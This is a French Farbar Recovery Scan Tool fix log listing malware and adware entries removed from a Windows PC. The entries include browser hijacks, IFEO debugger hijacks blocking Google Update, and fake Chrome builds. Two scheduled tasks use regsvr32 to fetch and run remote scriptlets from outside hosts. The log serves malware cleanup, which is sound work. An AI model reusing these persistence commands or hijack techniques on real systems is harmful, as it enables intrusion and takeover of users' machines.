cjoint

Document format: text/plain

Preview

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Exécuté par ju (28-08-2017 18:38:00) Run:1
Exécuté depuis C:\Users\ju\Desktop
Profils chargés: ju (Profils disponibles: ju)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************

CreateRestorePoint:
CloseProcesses:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy: Restriction
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKU\S-1-5-21-3418498205-250011256-4183487016-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
SearchScopes: HKU\S-1-5-21-3418498205-250011256-4183487016-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.)
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.)
R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Fichier non signé]
S2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp [84 2017-06-01] () [Fichier non signé]
C:\Users\ju\AppData\Local\background_fault\aswRD.exe
C:\Windows\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462}.job
HKU\S-1-5-21-3418498205-250011256-4183487016-1001\...\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
Task: {0256F7A3-EF25-48BD-A62A-219F40B2112C} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier
Task: {0E6E18F8-2F67-4D8C-A3D3-66373C3FCA35} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier
Task: {1C05EB90-59DB-492C-9940-B6B1F643ECC4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier
Task: {26C3685F-61C0-4870-8887-A2186572A8D3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier
Task: {3875D375-30E6-4508-80E6-D569C4ECF4F7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier
Task: {53279C3F-F7D4-4946-AC21-16C8CB5E5FCC} - System32\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462} => C:\Users\ju\AppData\Roaming\66AD2C~1\sync.exe
Task: {53F52824-5585-4C69-A155-4024F3DEA125} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier
Task: {727B5C37-BBDA-4663-9302-420BEA1DB9E3} - \WPD\SqmUpload_S-1-5-21-3418498205-250011256-4183487016-1001 -> Pas de fichier
Task: {7FCF2AA0-A6C9-4705-A4A8-347C9E554005} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier
Task: {8CA6606A-F0EB-4DA7-9AE6-918B92B0601D} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Pas de fichier
Task: {8FCD573B-3DB6-4405-98A5-D7AD8F45689A} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MdVQNkYxFdw3MWqyMkZWNYNLNdU1NdM8OUZXNkF1Mq== scrobj.dll
Task: {99B4CED9-7636-47F2-8C23-819219CD5D96} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier
Task: {A6018763-0286-4F6C-85CA-9512B2D500E4} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Pas de fichier
Task: {A9D82432-88F3-4E9E-9C21-D46CB1DEDE66} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Pas de fichier
Task: {ED706D6C-503F-400D-9ED8-175EF67A4FEA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier
Task: {EF3E0A66-3DAA-41D7-99FC-62E020F060B2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier
Task: {F29C2C95-8BCA-4714-9870-30A9D3C75C4D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {FCD47831-FFD6-48E1-8436-D3B1C3416B4C} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MdVQNkYxFdw3MWqyMkZWNYNLNdU1NdM8OUZXNkF1Mq== scrobj.dll
Task: C:\WINDOWS\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462}.job => C:\Users\ju\AppData\Roaming\66AD2C~1\sync.exe
ShortcutWithArgument: C:\Users\ju\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
ShortcutWithArgument: C:\Users\ju\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\QGIS Desktop 2.18.0.lnk -> C:\Program Files\QGIS 2.18\bin\nircmd.exe (NirSoft) -> exec hide C:\PROGRA~1\QGIS2~1.18\bin\qgis.bat
AlternateDataStreams: C:\WINDOWS\system32\Drivers\wuepltjz.sys:changelist [1406]
FirewallRules: [{0D630EDE-4D41-4DE1-B276-3AFBD56F5AE5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609_0\SZBrowser.exe
FirewallRules: [{563945AE-805F-4F24-A6B4-731B1820596D}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
EmptyTemp:

*****************

